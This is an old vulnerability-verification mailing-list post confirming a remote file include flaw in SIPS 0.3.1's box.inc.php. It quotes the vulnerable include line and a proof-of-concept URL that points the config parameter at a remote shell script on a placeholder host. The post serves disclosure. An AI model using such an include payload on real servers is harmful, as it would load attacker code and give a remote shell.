[VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Thu Feb 1 10:15:43 EST 2007
The program is vulnerable: $config[sipssys] is the first line of code
in the file box.inc.php.
But the documentation states.
Unpack the sips archive file. Sips requires a special directory where it
stores all kinds of data such as users, stories and php code. This directory
can be anywhere, but if you can, you should place it outside of the public
html area of the server, for security reasons.
So its kind of a coin toss up.
/str0ke
http://sourceforge.net/projects/sips/
<?
include $config["sipssys"] ."/code/rssparser.inc.php";
?>
//sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x
More information about the VIM
mailing list